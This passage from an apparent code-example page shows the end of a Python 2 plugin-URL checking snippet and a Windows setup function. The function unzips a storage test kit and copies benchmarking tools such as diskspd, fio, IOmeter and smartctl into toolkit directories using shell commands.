		f = re.sub('public Plugin:(.*?)\n}', 'public Plugin:\\1,\n    url = ""\n}', f, flags=(re.MULTILINE | re.DOTALL))
		f = re.sub(',,', ',', f) # I accidentally add an extra comma some times.
		m = re.search('url.*?=.*?"(.*?)"', f)
	try:
		urllib2.urlopen(m.group(1))
	except (ValueError, urllib2.HTTPError, urllib2.URLError) as e:
		print e
Пример #49
0
def binaries_setup(kit_location):

    if (not os.path.exists(kit_location)):
        print("binaries location is incorrect")
        print("press 'q' to exit and come back")
        close = input()
        if close == 'q' or close == 'Q':
            return 0

    kit_location = kit_location
    if kit_location.endswith("\\"):
        kit_location = kit_location
    else:
        kit_location = kit_location + "\\"
    all_files = os.listdir(kit_location)
    count = 0
    tc_zip = ''
    for item in all_files:
        if item.endswith(".zip"):
            tc_zip = item
            count += 1
    if count == 0:
        print(
            "No test kit zip in the provided location, copy it and run the program again "
        )
        os.sleep(2)
        return 0
    must_list = [
        "diskspd.exe", 'diskspd.xsd', 'Dynamo.exe', 'fio.exe', 'IOmeter.exe',
        'PsExec64.exe', 'smartctl.exe', 'StorageTool.exe'
    ]
    #print(all_files)
    if list_cmp(must_list, all_files) != 1:
        print("Something is missing copy items before you move forward ")
        print(
            "Required : 'diskspd.exe', 'diskspd.xsd', 'Dynamo.exe', 'fio.exe', 'IOmeter.exe', 'PsExec64.exe', 'smartctl.exe', 'StorageTool.exe'"
        )

    # unzip Tc file in C:\
    #copyfile(kit_location + tc_zip , "C:")
    zip_ref = zipfile.ZipFile(kit_location + tc_zip, 'r')
    zip_ref.extractall("C:\\")

    # change directory and file permissions
    #change_permission()

    # copy psexec file to C:\TestControllerUserFiles\Binaries
    PsExec_src = kit_location + "PsExec64.exe"
    PsExec_dst = "C:\TestControllerUserFiles\Binaries"
    copy_cmd = "copy " + PsExec_src + " " + PsExec_dst
    os.system(copy_cmd)

    #create SMART directory
    if "SMART" in os.listdir("C:\ToolkitUserFiles\Binaries"):
        os.system(
            "powershell Remove-Item C:\ToolkitUserFiles\Binaries\SMART  -Recurse"
        )
    smart_cmd = "mkdir C:\ToolkitUserFiles\Binaries\SMART"
    os.system(smart_cmd)
    #copy smartctl and storagetool to smart directory
    smart_src = kit_location + "smartctl.exe"
    storage_src = kit_location + "StorageTool.exe"
    smart_dest = "C:\ToolkitUserFiles\Binaries\SMART"
    os.system("copy " + smart_src + " " + smart_dest)
    os.system("copy " + storage_src + " " + smart_dest)

    #create fio directory
    if "fio" in os.listdir("C:\ToolkitUserFiles\Binaries"):
        os.system(
            "powershell Remove-Item C:\ToolkitUserFiles\Binaries\\fio  -Recurse"
        )
    fio_cmd = "mkdir C:\ToolkitUserFiles\Binaries\\fio"
    os.system(fio_cmd)
    #copy fio
    fio_src = kit_location + "fio.exe"
    fio_dst = "C:\ToolkitUserFiles\Binaries\\fio"
    fio_cmd = "copy " + fio_src + " " + fio_dst
    os.system(fio_cmd)

    #crete IOmeter directory
    if "Iometer" in os.listdir("C:\ToolkitUserFiles\Binaries"):
        os.system(
            "powershell Remove-Item C:\ToolkitUserFiles\Binaries\Iometer  -Recurse"
        )
    IOmeter_cmd = "mkdir C:\ToolkitUserFiles\Binaries\Iometer"
    os.system(IOmeter_cmd)
    # copy Iometer and dynamo to iomter directory
    iometer_src = kit_location + "IOmeter.exe"
    dynamo_src = kit_location + "Dynamo.exe"
    iometer_dest = "C:\ToolkitUserFiles\Binaries\Iometer"
    os.system("copy " + iometer_src + " " + iometer_dest)
    os.system("copy " + dynamo_src + " " + iometer_dest)

    # crete Diskspd directory
    if "DiskSpd" in os.listdir("C:\ToolkitUserFiles\Binaries"):
        os.system(
            "powershell Remove-Item C:\ToolkitUserFiles\Binaries\DiskSpd  -Recurse"
        )
    DiskSpd_cmd = "mkdir C:\ToolkitUserFiles\Binaries\DiskSpd"
    os.system(DiskSpd_cmd)
    # copy disksdp exe and xsd directory
    DiskSpd_src = kit_location + "diskspd.exe"
    DiskSpd_xsd_src = kit_location + "diskspd.xsd"
    DiskSpd_dest = "C:\ToolkitUserFiles\Binaries\DiskSpd"
    os.system("copy " + DiskSpd_src + " " + DiskSpd_dest)
    os.system("copy " + DiskSpd_xsd_src + " " + DiskSpd_dest)

    #copy json file to C:\Toolkituserfiles
    json_src = kit_location + "config.json"
    json_dst = "C:\ToolkitUserFiles"
    copy_cmd = "copy " + json_src + " " + json_dst
    os.system(copy_cmd)

    #copy change startconrtoller file
    startfile_src = kit_location + "StartController.ps1"
    startfile_dest = "C:\ToolkitUserFiles"
    startfile_copy_cmd = "copy " + startfile_src + " " + startfile_dest
    os.system(startfile_copy_cmd)